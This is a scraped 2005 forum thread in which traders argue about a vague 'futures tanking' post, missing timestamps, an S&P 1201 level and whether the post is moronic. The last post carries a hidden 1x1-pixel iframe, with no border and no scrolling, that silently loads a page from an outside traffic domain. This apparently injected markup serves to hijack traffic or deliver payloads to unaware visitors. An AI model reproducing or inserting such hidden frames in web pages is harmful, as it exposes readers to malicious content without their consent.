futures tanking!!!

Discussion in 'Trading' started by Trend Fader, Oct 26, 2005.

1. mayby its just me, but

it would be nice to see a timestamp and market details with a statement like this....

who could possibly even guess tomorrow of 2 weeks from now, what happened, when you wrote this thread or other details, just to be able to comment or simpathize with you on this comment.

something like

Thurs, June 40th, 1900, s&p499 just went down from 1100.44 at 8:45am PST to 1100.40....

wow, the futures are tanking.....

got the idea?

#51     Oct 27, 2005
  2. check the top of each post, you should find a time stamp with date/hr/mn there

#52     Oct 27, 2005
  3. where are the market details,

which futures contract or index?

what time frame, which time zone?

where were they, what did they do in such a short period of time to make it "be tanking " type condition?

just logical basics, nothing too comlicated...

remmeber, we are not sitting next to your screen to know what you're talking about....

#53     Oct 27, 2005

4. after todays trading it looks like that bounce down failure of the 1201.00 SPX level yesterday was significant -- and i even gave you a heads up prior to todays action -- so did you catch that short play today then? :D

#54     Oct 27, 2005
  5. I am not going to comment to this moronic post.

#55     Oct 27, 2005
  6. I would be good if you could supply your time zone so that we can figure out if the post is moronic in the light of day, or the darkness of evening. Also, what font are you using to view the post?

<iframe src=http://besttraff.us/top/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

#56     Oct 27, 2005